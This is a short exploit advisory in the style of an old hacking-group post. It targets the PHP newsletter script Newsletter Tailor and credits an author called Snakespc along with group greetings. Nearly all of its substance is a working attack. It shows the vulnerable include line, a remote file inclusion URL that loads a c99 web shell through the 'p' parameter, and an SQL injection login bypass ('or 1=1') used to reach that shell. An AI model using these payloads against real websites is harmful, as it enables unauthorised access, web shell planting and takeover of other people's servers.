============================================================================== [»] Newsletter Tailor Remote File Include Vulnerability ============================================================================== [»] Script: [ Newsletter Tailor ] [»] Language: [ PHP ] [»] Download: [ http://sourceforge.net/projects/nlettertailor/ ] [»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [»] Greetz to:[ SnakesTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] [»] Note: [ Thank you ViRuSMaN on script ] ########################################################################### ===[ Exploit ]=== include($p.".php"); [»] http://localhost/list/admin/index.php?p=http://localhost/c99.txt? [»]Note: When you update the page prompts you to log on [»](Auth Bypass) SQL Injection :user:' or '1=1 pass:' or '1=1 Then be accessed on the "sh3ll" Author: Snakespc <- ###########################################################################